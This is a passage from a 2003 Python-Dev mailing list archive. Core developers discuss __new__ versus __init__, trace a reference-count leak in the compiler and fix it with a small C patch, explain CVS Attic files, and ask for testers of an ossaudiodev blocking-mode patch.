> > __new__ creates a new, initialized object.  __init__ sets some values
> > in an exsting object.  __init__ is a regular method and can be called
> > to reinitialize an existing object (not that I recommend this, but the
> > mechanism doesn't forbid it).  It follows that immutable objects must
> > be initialized using __new__, since by the time __init__ is called the
> > object already exists and is immutable.

[David again]
> Shouldn't most objects be initialized by __new__, really?  IME it's
> dangerous to have uninitialized objects floating about, especially in
> the presence of exceptions.

Normally, there are no external references to an object until after
__init__ returns, so you should be safe unless __init__ saves a
reference to self somewhere.  It does mean that __del__ can be
surprised by an uninitialized object, and that's a known pitfall.
And an exception in the middle of __new__ has the same problem.

So I don't think __new__ is preferred over __init__, unless you need a
feature that only __new__ offers (like initializing an immutable base
class or returning an existing object or an object of a different
class).

> >> In the absence of clear guidelines I'm tempted to suggest that C++ got
> >> this part right.
> >
> > Of course you would.
> 
> Oh, c'mon.  C++ is ugly, both brittle *and* inflexible, expensive,
> painful, etc.  There must be at least _one_ well-designed thing about
> it.  Maybe this is it!

You said it. :-)

> > I tend to think that Python's analogon to C++ constructors is
> > __new__,
> 
> Yup.
> 
> > and that __init__ is a different mechanism (although it can often be
> > used where you would use a constructor in C++).
> >
> >> Occasionally we get people who think they want to call overridden
> >> virtual functions from constructors (I presume the analogous thing
> >> could be done safely from __init__ but not from __new__)
> >
> > Whether or not that can be done safely from __init__ depends on the
> > subclass __init__; it's easy enough to construct examples that don't
> > work.  But yes, for __new__ the situation is more analogous to C++,
> > except that AFAIK in C++ when you try that you get the base class
> > virtual function, while in Python you get the overridden method --
> > which finds an instance that is incompletely initialized.
> 
> Either one seems equally likely to be what you don't want.

Yeah, this is something where you can't seem to win. :-(

> >> but that's pretty rare.  I'm interested in gaining insight into the
> >> Pythonic thinking behind __new__/__init__; I'm sure I don't have the
> >> complete picture.
> >
> > __new__ was introduced to allow initializing immutable objects. It
> > really applies more to types implemented in C than types implemented
> > in Python.  But it is needed so that a Python subclass of an immutable
> > C base classs can pass arguments of its choice to the C base class's
> > constructor.
> >
> >> Nice. Too bad about 2.2.
> >
> > Maybe the new pickling could be backported, but I fear that it depends
> > on some other 2.3 feature that's harder to backport, so I haven't
> > looked into this.
> 
> Are people who don't want to upgrade really that much more willing if
> it doesn't involve a minor revision number?  I figure that if I
> supported 2.2 once, I'd have to be very circumspect about doing
> something which required an upgrade to 2.2.x.

The idea is that an upgrade from 2.2.x to 2.2.(x+1) won't break any
code, it will only fix bugs.  For example, Zope requires Python 2.2.1
because of a particular bug in Python 2.2[.0] that caused Zope core
dumps.  Of course, the "breaks no code" promise can't be true 100%
(because some code could depend on a bug), but we try a lot harder not
to break stuff than with a 2.x to 2.(x+1).  Even though there we also
try not to break stuff, we're less anal about it (otherwise the
language would just get uglier and uglier by maintaining strict
backwards compatibility with all past mistakes).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From dave@boost-consulting.com  Sun Mar 23 23:18:26 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sun, 23 Mar 2003 18:18:26 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <200303232233.h2NMXx905265@pcp02138704pcs.reston01.va.comcast.net> (Guido
 van Rossum's message of "Sun, 23 Mar 2003 17:33:59 -0500")
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
 <200303232115.h2NLFFA04846@pcp02138704pcs.reston01.va.comcast.net>
 <uof41oim2.fsf@boost-consulting.com>
 <200303232233.h2NMXx905265@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <uhe9toenx.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

> [Guido]
>> > __new__ creates a new, initialized object.  __init__ sets some values
>> > in an exsting object.  __init__ is a regular method and can be called
>> > to reinitialize an existing object (not that I recommend this, but the
>> > mechanism doesn't forbid it).  It follows that immutable objects must
>> > be initialized using __new__, since by the time __init__ is called the
>> > object already exists and is immutable.
>
> [David again]
>> Shouldn't most objects be initialized by __new__, really?  IME it's
>> dangerous to have uninitialized objects floating about, especially in
>> the presence of exceptions.
>
> Normally, there are no external references to an object until after
> __init__ returns

Good point; that's a feature you don't get unless you build two-phase
initialization into the core language.  Two-phase initialization is
more dangerous in C++ because it's not a core language feature.

> so you should be safe unless __init__ saves a reference to self
> somewhere.  It does mean that __del__ can be surprised by an
> uninitialized object, and that's a known pitfall.  And an exception
> in the middle of __new__ has the same problem.

C++ deals with that by only destroying the fully-initialized bases and
subobjects when an exception is thrown during construction.  That's
hard to do in the presence of two-phase initialization, though.  It
may be less of a problem for Python because __del__ is much less
commonly needed than nontrivial destructors are in C++.

> So I don't think __new__ is preferred over __init__, unless you need a
> feature that only __new__ offers (like initializing an immutable base
> class or returning an existing object or an object of a different
> class).

In other words, TIMTOWTDI? <0.3 wink>

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From tismer@tismer.com  Mon Mar 24 12:40:44 2003
From: tismer@tismer.com (Christian Tismer)
Date: Mon, 24 Mar 2003 13:40:44 +0100
Subject: [Python-Dev] funny leak
Message-ID: <3E7EFCCC.2090202@tismer.com>

Hi Tim et al,

I just tested generators and found a memory leak.
(Has nothing to do with generators).
The following code adds one to the overall refcount
and gc cannot reclaim it.

def conjoin(gs):
     def gen():
         gs      # unbreakable cycle
         gen     # unless one is commented out

Should I send a bug report, or is this known?

The above holds for Python 2.2.2 upto the current CVS
version.

ciao - chris
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From neal@metaslash.com  Mon Mar 24 13:43:16 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Mon, 24 Mar 2003 08:43:16 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <3E7EFCCC.2090202@tismer.com>
References: <3E7EFCCC.2090202@tismer.com>
Message-ID: <20030324134316.GR25722@epoch.metaslash.com>

On Mon, Mar 24, 2003 at 01:40:44PM +0100, Christian Tismer wrote:
> 
> I just tested generators and found a memory leak.
> (Has nothing to do with generators).
> The following code adds one to the overall refcount
> and gc cannot reclaim it.
> 
> def conjoin(gs):
>     def gen():
>         gs      # unbreakable cycle
>         gen     # unless one is commented out

With current CVS:

        >>> gc.collect()
        0
        [23150 refs]
        >>> conjoin(1)
        [23160 refs]
        >>> conjoin(1)
        [23170 refs]
        >>> gc.collect()
        8
        [23151 refs]
        >>> conjoin(1)
        [23161 refs]
        >>> conjoin(1)
        [23171 refs]
        >>> gc.collect()
        8
        [23151 refs]
        >>> conjoin(1)
        [23161 refs]
        >>> conjoin(1)
        [23171 refs]
        >>> gc.collect()
        8
        [23151 refs]

One ref may be leaked the first time gc.collect() is called with
garbage (23150 -> 23151).  But after that, no more refs are leaked
(ref count stays at 23151).

Neal


From jepler@unpythonic.net  Mon Mar 24 13:51:00 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Mon, 24 Mar 2003 07:51:00 -0600
Subject: [Python-Dev] funny leak
In-Reply-To: <20030324134316.GR25722@epoch.metaslash.com>
References: <3E7EFCCC.2090202@tismer.com> <20030324134316.GR25722@epoch.metaslash.com>
Message-ID: <20030324135059.GB28860@unpythonic.net>

On Mon, Mar 24, 2003 at 08:43:16AM -0500, Neal Norwitz wrote:
> One ref may be leaked the first time gc.collect() is called with
> garbage (23150 -> 23151).  But after that, no more refs are leaked
> (ref count stays at 23151).

If that's true, then running the 'def' block repeatedly will leak
references, right?  I think from Christian's original message this is
what he meant, but I'm not sure.

Jeff


From neal@metaslash.com  Mon Mar 24 14:00:23 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Mon, 24 Mar 2003 09:00:23 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <20030324135059.GB28860@unpythonic.net>
References: <3E7EFCCC.2090202@tismer.com>
 <20030324134316.GR25722@epoch.metaslash.com>
 <20030324135059.GB28860@unpythonic.net>
Message-ID: <20030324140023.GT25722@epoch.metaslash.com>

On Mon, Mar 24, 2003 at 07:51:00AM -0600, Jeff Epler wrote:
> On Mon, Mar 24, 2003 at 08:43:16AM -0500, Neal Norwitz wrote:
> > One ref may be leaked the first time gc.collect() is called with
> > garbage (23150 -> 23151).  But after that, no more refs are leaked
> > (ref count stays at 23151).
> 
> If that's true, then running the 'def' block repeatedly will leak
> references, right?  I think from Christian's original message this is
> what he meant, but I'm not sure.

I misread the original message.  Running the 'def' block does indeed
leak a reference and collect() has no effect.  Similarly:

        [23154 refs]
        >>> def conjoin(gs):
        ...     def gen():
        ...         gs      # unbreakable cycle
        ...         gen     # unless one is commented out
        ... 
        [23194 refs]
        >>> del conjoin
        [23155 refs]

Neal


From tismer@tismer.com  Mon Mar 24 14:04:46 2003
From: tismer@tismer.com (Christian Tismer)
Date: Mon, 24 Mar 2003 15:04:46 +0100
Subject: [Python-Dev] funny leak
In-Reply-To: <20030324134316.GR25722@epoch.metaslash.com>
References: <3E7EFCCC.2090202@tismer.com> <20030324134316.GR25722@epoch.metaslash.com>
Message-ID: <3E7F107E.4020403@tismer.com>

Neal Norwitz wrote:
> On Mon, Mar 24, 2003 at 01:40:44PM +0100, Christian Tismer wrote:
> 
>>I just tested generators and found a memory leak.
>>(Has nothing to do with generators).
>>The following code adds one to the overall refcount
>>and gc cannot reclaim it.
>>
>>def conjoin(gs):
>>    def gen():
>>        gs      # unbreakable cycle
>>        gen     # unless one is commented out
> 
> 
> With current CVS:
...

> One ref may be leaked the first time gc.collect() is called with
> garbage (23150 -> 23151).  But after that, no more refs are leaked
> (ref count stays at 23151).

No, this is not the point. Don't call the function
at all, just execute the above code and call
gc.collect(). You will see one reference eaten
every time you repeat this.

ciao - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From tismer@tismer.com  Mon Mar 24 14:05:18 2003
From: tismer@tismer.com (Christian Tismer)
Date: Mon, 24 Mar 2003 15:05:18 +0100
Subject: [Python-Dev] funny leak
In-Reply-To: <20030324135059.GB28860@unpythonic.net>
References: <3E7EFCCC.2090202@tismer.com> <20030324134316.GR25722@epoch.metaslash.com> <20030324135059.GB28860@unpythonic.net>
Message-ID: <3E7F109E.2060401@tismer.com>

Jeff Epler wrote:
> On Mon, Mar 24, 2003 at 08:43:16AM -0500, Neal Norwitz wrote:
> 
>>One ref may be leaked the first time gc.collect() is called with
>>garbage (23150 -> 23151).  But after that, no more refs are leaked
>>(ref count stays at 23151).
> 
> 
> If that's true, then running the 'def' block repeatedly will leak
> references, right?  I think from Christian's original message this is
> what he meant, but I'm not sure.

Exactly.
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From oren-py-d@hishome.net  Mon Mar 24 14:06:38 2003
From: oren-py-d@hishome.net (Oren Tirosh)
Date: Mon, 24 Mar 2003 09:06:38 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <uhe9toenx.fsf@boost-consulting.com>
References: <ur88zougj.fsf@boost-consulting.com> <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net> <uof42i1ey.fsf@boost-consulting.com> <200303232115.h2NLFFA04846@pcp02138704pcs.reston01.va.comcast.net> <uof41oim2.fsf@boost-consulting.com> <200303232233.h2NMXx905265@pcp02138704pcs.reston01.va.comcast.net> <uhe9toenx.fsf@boost-consulting.com>
Message-ID: <20030324140638.GA41602@hishome.net>

On Sun, Mar 23, 2003 at 06:18:26PM -0500, David Abrahams wrote:
> Guido van Rossum <guido@python.org> writes:
...
> > [Guido]
...>
> > [David again]
...
> > > [Guido]
..

Ummm... I'm confused. So what is the recommended way to do it? 

   Oren


From tim.one@comcast.net  Mon Mar 24 15:57:04 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 10:57:04 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <3E7F107E.4020403@tismer.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHIECAB.tim.one@comcast.net>

[Christian Tismer]
> No, this is not the point. Don't call the function
> at all, just execute the above code and call
> gc.collect(). You will see one reference eaten
> every time you repeat this.

Can you show explicit evidence instead of trying to describe it?  Here's
what I tried:

def one():
    def conjoin(gs):
        def gen():
            gs      # unbreakable cycle
            gen     # unless one is commented out

import sys, gc
lastrc = 0
while 1:
    one()
    gc.collect()
    thisrc = sys.gettotalrefcount()
    print thisrc - lastrc,
    lastrc = thisrc

Running that program under a debug-build CVS Python shows no growth in
sys.gettotalrefcount() after the first two iterations.  It also displays no
process-size growth.  IOW, I see no evidence of any flavor of leak.

I don't claim that you don't, but I don't know what "just execute the above
code ... one reference eaten every time" *means*.  It can't mean executing
the specific program I pasted in above, because that simply doesn't eat a
reference each time.


From tim.one@comcast.net  Mon Mar 24 16:02:14 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 11:02:14 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <3E7F107E.4020403@tismer.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHJECAB.tim.one@comcast.net>

OK, *this* program leaks a reference each time around; probably a missing
decref in the compiler:

source = """\
def conjoin(gs):
    def gen():
        gs      # unbreakable cycle
        gen     # unless one is commented out
"""

def one():
    exec source in {}

import sys, gc
lastrc = 0
while 1:
    one()
    gc.collect()
    thisrc = sys.gettotalrefcount()
    print thisrc - lastrc,
    lastrc = thisrc


From tim.one@comcast.net  Mon Mar 24 16:10:46 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 11:10:46 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <3E7F107E.4020403@tismer.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEHJECAB.tim.one@comcast.net>

OK, there's no leaking memory here, but there is a leaking refcount:  the
refcount on the int 0 keeps going up.  The compiler has leaked references to
little integers before, but offhand I don't recall the details.

----- old stuff -----
OK, *this* program leaks a reference each time around; probably a missing
decref in the compiler:

source = """\
def conjoin(gs):
    def gen():
        gs      # unbreakable cycle
        gen     # unless one is commented out
"""

def one():
    exec source in {}

import sys, gc
lastrc = 0
while 1:
    one()
    gc.collect()
    thisrc = sys.gettotalrefcount()
    print thisrc - lastrc,
    lastrc = thisrc


From mwh@python.net  Mon Mar 24 16:47:34 2003
From: mwh@python.net (Michael Hudson)
Date: Mon, 24 Mar 2003 16:47:34 +0000
Subject: [Python-Dev] funny leak
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEHJECAB.tim.one@comcast.net> (Tim
 Peters's message of "Mon, 24 Mar 2003 11:10:46 -0500")
References: <LNBBLJKPBEHFEDALKOLCOEHJECAB.tim.one@comcast.net>
Message-ID: <2m7kaoaezd.fsf@starship.python.net>

Tim Peters <tim.one@comcast.net> writes:

> OK, there's no leaking memory here, but there is a leaking refcount:  the
> refcount on the int 0 keeps going up.  The compiler has leaked references to
> little integers before, but offhand I don't recall the details.

This seems to be all it takes:

Index: compile.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Python/compile.c,v
retrieving revision 2.275
diff -c -C7 -r2.275 compile.c
*** compile.c	12 Feb 2003 16:56:51 -0000	2.275
--- compile.c	24 Mar 2003 16:43:28 -0000
***************
*** 4524,4537 ****
--- 4564,4578 ----
  	d = PyDict_New();
  	for (i = PyList_GET_SIZE(list); --i >= 0; ) {
  		v = PyInt_FromLong(i);
  		if (v == NULL) 
  			goto fail;
  		if (PyDict_SetItem(d, PyList_GET_ITEM(list, i), v) < 0)
  			goto fail;
+ 		Py_DECREF(v);
  		if (PyDict_DelItem(*cellvars, PyList_GET_ITEM(list, i)) < 0)
  			goto fail;
  	}
  	pos = 0;
  	i = PyList_GET_SIZE(list);
  	Py_DECREF(list);
  	while (PyDict_Next(*cellvars, &pos, &v, &w)) {

... found by the obscure strategy of searching for "PyInt_FromLong" in
Python/compile.c ...

A quick eyeballing suggests there are a bunch more of these, but only
on error returns.

Cheers,
M.

-- 
  ... when all the programmes on all the channels actually were made
  by actors with cleft pallettes speaking lines by dyslexic writers
  filmed by blind cameramen instead of merely seeming like that, it
  somehow made the whole thing more worthwhile.   -- HHGTG, Episode 11


From jacobs@penguin.theopalgroup.com  Mon Mar 24 17:37:18 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Mon, 24 Mar 2003 12:37:18 -0500 (EST)
Subject: [Python-Dev] funny leak
In-Reply-To: <2m7kaoaezd.fsf@starship.python.net>
Message-ID: <Pine.LNX.4.44.0303241234530.16478-100000@penguin.theopalgroup.com>

On Mon, 24 Mar 2003, Michael Hudson wrote:

> Tim Peters <tim.one@comcast.net> writes:
> 
> > OK, there's no leaking memory here, but there is a leaking refcount:  the
> > refcount on the int 0 keeps going up.  The compiler has leaked references to
> > little integers before, but offhand I don't recall the details.
> 
> This seems to be all it takes:

Your patch isn't a 100% fix, since a reference can still be leaked if the
PyDict_SetItem fails.  If nobody beats me to it, I can do a validation pass
through compile.c and see how many I can squash.

-Kevin


> 
> Index: compile.c
> ===================================================================
> RCS file: /cvsroot/python/python/dist/src/Python/compile.c,v
> retrieving revision 2.275
> diff -c -C7 -r2.275 compile.c
> *** compile.c	12 Feb 2003 16:56:51 -0000	2.275
> --- compile.c	24 Mar 2003 16:43:28 -0000
> ***************
> *** 4524,4537 ****
> --- 4564,4578 ----
>   	d = PyDict_New();
>   	for (i = PyList_GET_SIZE(list); --i >= 0; ) {
>   		v = PyInt_FromLong(i);
>   		if (v == NULL) 
>   			goto fail;
>   		if (PyDict_SetItem(d, PyList_GET_ITEM(list, i), v) < 0)
>   			goto fail;
> + 		Py_DECREF(v);
>   		if (PyDict_DelItem(*cellvars, PyList_GET_ITEM(list, i)) < 0)
>   			goto fail;
>   	}
>   	pos = 0;
>   	i = PyList_GET_SIZE(list);
>   	Py_DECREF(list);
>   	while (PyDict_Next(*cellvars, &pos, &v, &w)) {
> 
> ... found by the obscure strategy of searching for "PyInt_FromLong" in
> Python/compile.c ...
> 
> A quick eyeballing suggests there are a bunch more of these, but only
> on error returns.
> 
> Cheers,
> M.
> 
> 

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com


From tim.one@comcast.net  Mon Mar 24 17:51:40 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 12:51:40 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <Pine.LNX.4.44.0303241234530.16478-100000@penguin.theopalgroup.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEIBECAB.tim.one@comcast.net>

[Michael Hudson]
>> This seems to be all it takes:

[Kevin Jacobs]
> Your patch isn't a 100% fix, since a reference can still be leaked if
> the PyDict_SetItem fails.

The patch I checked in paid attention to that.

> If nobody beats me to it, I can do a validation pass
> through compile.c and see how many I can squash.
> ...
> A quick eyeballing suggests there are a bunch more of these, but only
> on error returns.

Possibly.  If a dict setitem call fails, it's almost certainly because we're
out of memory, and the program is going to die soon regardless.  How much
pain it's worth to die with a refcount that's not one too large is open to
debate <wink>.


From mwh@python.net  Mon Mar 24 17:55:40 2003
From: mwh@python.net (Michael Hudson)
Date: Mon, 24 Mar 2003 17:55:40 +0000
Subject: [Python-Dev] funny leak
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEIBECAB.tim.one@comcast.net> (Tim
 Peters's message of "Mon, 24 Mar 2003 12:51:40 -0500")
References: <LNBBLJKPBEHFEDALKOLCCEIBECAB.tim.one@comcast.net>
Message-ID: <2my9348x9f.fsf@starship.python.net>

Tim Peters <tim.one@comcast.net> writes:

[me]
>> A quick eyeballing suggests there are a bunch more of these, but only
>> on error returns.
>
> Possibly.  If a dict setitem call fails, it's almost certainly because we're
> out of memory, and the program is going to die soon regardless.  How much
> pain it's worth to die with a refcount that's not one too large is open to
> debate <wink>.

This occurred to me too.  I don't think I care enough to do anything
about it today.

Cheers,
M.

-- 
  In case you're not a computer person, I should probably point out
  that "Real Soon Now" is a technical term meaning "sometime before
  the heat-death of the universe, maybe".
                                     -- Scott Fahlman <sef@cs.cmu.edu>


From tim.one@comcast.net  Mon Mar 24 17:59:54 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 12:59:54 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <2m7kaoaezd.fsf@starship.python.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEIDECAB.tim.one@comcast.net>

[Michael Hudson]
> ... found by the obscure strategy of searching for "PyInt_FromLong" in
> Python/compile.c ...

Heh.  Here at the PyCon sprint, Jeremy & I did the same thing.  The mystery
for you is how I figued out 0 was leaking to begin with -- but my lips are
sealed.


From skip@pobox.com  Mon Mar 24 18:16:27 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 24 Mar 2003 12:16:27 -0600
Subject: [Python-Dev] funny leak
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEIDECAB.tim.one@comcast.net>
References: <2m7kaoaezd.fsf@starship.python.net>
 <LNBBLJKPBEHFEDALKOLCAEIDECAB.tim.one@comcast.net>
Message-ID: <15999.19323.486024.376000@montanaro.dyndns.org>

    Tim> Heh.  Here at the PyCon sprint ...

So how's it going?

S


From tim.one@comcast.net  Mon Mar 24 20:19:55 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 15:19:55 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <15999.19323.486024.376000@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEILECAB.tim.one@comcast.net>

[Tim]
> Heh.  Here at the PyCon sprint ...

[Skip Montanaro]
> So how's it going?

I wouldn't have guessed it, but legions of Indonesian houseboys giving
sprinters foot massages really does increase productivity!  I'm not so sure
about the ubiquitous champagne fountains, though.

roughing-it-ly y'rs  - tim


From tismer@tismer.com  Mon Mar 24 22:48:43 2003
From: tismer@tismer.com (Christian Tismer)
Date: Mon, 24 Mar 2003 23:48:43 +0100
Subject: [Python-Dev] funny leak
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHIECAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCGEHIECAB.tim.one@comcast.net>
Message-ID: <3E7F8B4B.1040006@tismer.com>

Tim Peters wrote:
> [Christian Tismer]
> 
>>No, this is not the point. Don't call the function
>>at all, just execute the above code and call
>>gc.collect(). You will see one reference eaten
>>every time you repeat this.
> 
> 
> Can you show explicit evidence instead of trying to describe it?  Here's
> what I tried:

Sorry, I had to re-read your message several times
until I understood where I wasn't clear:

By "execute" I meant exec() this piece of Python code.
I actually pasted it in, watching the refcount grow.

cheers - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From skip@pobox.com  Tue Mar 25 00:06:22 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 24 Mar 2003 18:06:22 -0600
Subject: [Python-Dev] Checkins to Attic?
Message-ID: <15999.40318.473557.200043@montanaro.dyndns.org>

I noticed on the python-checkins list that several changes (newcompile.c and
friends) were checked into what appears to be the Attic, e.g.:

    Update of /cvsroot/python/python/dist/src/Python
    In directory sc8-pr-cvs1:/tmp/cvs-serv2961/Python

    Modified Files:
          Tag: ast-branch
            newcompile.c 
    Log Message:
    Redeclared stuff to stop wngs about signed-vs-unsigned mismatches.


    Index: newcompile.c
    ===================================================================
    RCS file: /cvsroot/python/python/dist/src/Python/Attic/newcompile.c,v
    retrieving revision 1.1.2.23
    retrieving revision 1.1.2.24

Note the RCS file above.  Not all files were in the Attic though:

    Update of /cvsroot/python/python/dist/src/Include
    In directory sc8-pr-cvs1:/tmp/cvs-serv2961/Include

    Modified Files:
          Tag: ast-branch
            compile.h 
    Log Message:
    Redeclared stuff to stop wngs about signed-vs-unsigned mismatches.


    Index: compile.h
    ===================================================================
    RCS file: /cvsroot/python/python/dist/src/Include/compile.h,v

I'm probably just missing something obvious, but I thought I'd ask.

Skip


From tim.one@comcast.net  Tue Mar 25 00:10:56 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 19:10:56 -0500
Subject: [Python-Dev] Checkins to Attic?
In-Reply-To: <15999.40318.473557.200043@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEKAECAB.tim.one@comcast.net>

As explained on the checkins list, files that are brand new on a branch live
in the Attic.  CVS uses the Attic for several things, and there's no problem
here.


From neal@metaslash.com  Tue Mar 25 00:11:31 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Mon, 24 Mar 2003 19:11:31 -0500
Subject: [Python-Dev] Checkins to Attic?
In-Reply-To: <15999.40318.473557.200043@montanaro.dyndns.org>
References: <15999.40318.473557.200043@montanaro.dyndns.org>
Message-ID: <20030325001130.GD12443@epoch.metaslash.com>

On Mon, Mar 24, 2003 at 06:06:22PM -0600, Skip Montanaro wrote:
> I noticed on the python-checkins list that several changes (newcompile.c and
> friends) were checked into what appears to be the Attic, e.g.:
> 
        [snip Attic/newcompile.c]
> 
> Note the RCS file above.  Not all files were in the Attic though:
> 
        [snip Include/compile.h]
> 
> I'm probably just missing something obvious, but I thought I'd ask.

newcompile.c only exists on the branch, not on the head, but
compile.h exists in the head.

I believe files that are only on the branch reside in the Attic.
But shhhh, don't tell the neighbors. :-)

Neal


From gward@python.net  Tue Mar 25 02:04:20 2003
From: gward@python.net (Greg Ward)
Date: Mon, 24 Mar 2003 21:04:20 -0500
Subject: [Python-Dev] ossaudiodev tweak needs testing
Message-ID: <20030325020420.GA1406@cthulhu.gerg.ca>

Hi all -- I have another tweak to the ossaudiodev module that might make
it work a little better.  Background: some time ago, Jeremy and Guido
had problems with test_ossaudiodev hanging due to a blocking open()
call.  So I made the open() non-blocking in rev 1.25 on 2003/03/11.  But
that screwed things up for David Hammerton, who emailed me privately the
other day that a write() call later on was dying with EAGAIN -- not
entirely surprising, since that's how write() is supposed to behave on a
file descriptor opened with O_NONBLOCK if it would have blocked.  Most
OSS device drivers don't actually act that way (sigh), but apparently
David's does.

So this patch reverses the effect of open() with O_NONBLOCK, meaning the
file is back in blocking mode in the conventional Unix sense.  (It's in
blocking mode in the OSS sense the whole time, or at least until Python
code calls the nonblock() method on it.)  If you have a Linux or FreeBSD
machine with sound hardware that works, can you please run

  ./python Lib/test/regrtest.py -uaudio test_ossaudiodev

with the current CVS head (ie. rev 1.25 of ossaudiodev.c and rev 1.4 of
test_ossaudiodev.py), then apply this patch:

--- Modules/ossaudiodev.c       11 Mar 2003 16:53:13 -0000      1.25
+++ Modules/ossaudiodev.c       25 Mar 2003 01:54:46 -0000
@@ -139,6 +139,15 @@
         PyErr_SetFromErrnoWithFilename(PyExc_IOError, basedev);
         return NULL;
     }
+
+    /* And (try to) put it back in blocking mode so we get the
+       expected write() semantics. */
+    if (fcntl(fd, F_SETFL, 0) == -1) {
+        close(fd);
+        PyErr_SetFromErrnoWithFilename(PyExc_IOError, basedev);
+        return NULL;
+    }
+
     if (ioctl(fd, SNDCTL_DSP_GETFMTS, &afmts) == -1) {
         PyErr_SetFromErrnoWithFilename(PyExc_IOError, basedev);
         return NULL;

and try it again?  If it works in both cases, great.  If it crashed with
CVS head (EAGAIN from write()?), and now works, wonderful!  (Please let
me know.)  If it works before this patch but not with it, then PLEASE
let me know!  Otherwise I'll check this in.

Thanks --

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/


From graham_guttocks@yahoo.co.nz  Tue Mar 25 19:42:00 2003
From: graham_guttocks@yahoo.co.nz (=?iso-8859-1?q?Graham=20Guttocks?=)
Date: Wed, 26 Mar 2003 07:42:00 +1200 (NZST)
Subject: [Python-Dev] cvs.python.sourceforge.net fouled up
Message-ID: <20030325194200.52171.qmail@web10305.mail.yahoo.com>

$ cvs update
cvs [update aborted]: recv() from server cvs.python.sourceforge.net: EOF

I've been having this problem on and off for weeks now with
anonymous Python cvs.

=====
Regards,
Graham

http://mobile.yahoo.com.au - Yahoo! Mobile
- Check & compose your email via SMS on your Telstra or Vodafone mobile.


From skip@pobox.com  Tue Mar 25 19:58:50 2003
From: skip@pobox.com (Skip Montanaro)
